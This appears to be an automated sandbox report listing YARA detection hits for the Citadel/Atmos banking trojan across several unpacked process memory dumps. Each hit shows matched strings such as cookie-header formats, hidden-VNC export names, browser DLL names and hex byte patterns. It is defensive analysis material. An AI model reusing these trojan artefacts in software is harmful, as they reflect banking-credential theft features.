4.0.svchost.exe.9a0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
4.0.svchost.exe.9a0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 9A 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 9A 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 9A 00
4.0.svchost.exe.9a0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
22.3.SystemSettings.exe.f10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
22.3.SystemSettings.exe.f10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
22.3.SystemSettings.exe.f10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
22.3.SystemSettings.exe.f10000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
22.3.SystemSettings.exe.f10000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
3.3.svchost.exe.910000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
3.3.svchost.exe.910000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
3.3.svchost.exe.910000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
3.3.svchost.exe.910000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
3.3.svchost.exe.910000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
14.0.RuntimeBroker.exe.ab0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
14.0.RuntimeBroker.exe.ab0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
14.0.RuntimeBroker.exe.ab0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
14.0.RuntimeBroker.exe.ab0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
14.0.RuntimeBroker.exe.ab0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
23.3.UserOOBEBroker.exe.10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
23.3.UserOOBEBroker.exe.10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
23.3.UserOOBEBroker.exe.10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
23.3.UserOOBEBroker.exe.10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
23.3.UserOOBEBroker.exe.10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
26.3.conhost.exe.30000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
26.3.conhost.exe.30000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
26.3.conhost.exe.30000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
26.3.conhost.exe.30000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
26.3.conhost.exe.30000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
3.3.svchost.exe.910000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
3.3.svchost.exe.910000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
3.3.svchost.exe.910000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
3.3.svchost.exe.910000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
3.3.svchost.exe.910000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
0.3.services.png.exe.2590000.1.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12b39:$MZ: 4D 5A 0x140c7:$MZ: 4D 5A 0x3e608:$MZ: 4D 5A 0x3dcd4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3dd78:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2ec20:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2ec40:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3db27:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
28.3.RuntimeBroker.exe.810000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
28.3.RuntimeBroker.exe.810000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
28.3.RuntimeBroker.exe.810000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
28.3.RuntimeBroker.exe.810000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
28.3.RuntimeBroker.exe.810000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
23.0.UserOOBEBroker.exe.10000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
23.0.UserOOBEBroker.exe.10000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
23.0.UserOOBEBroker.exe.10000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
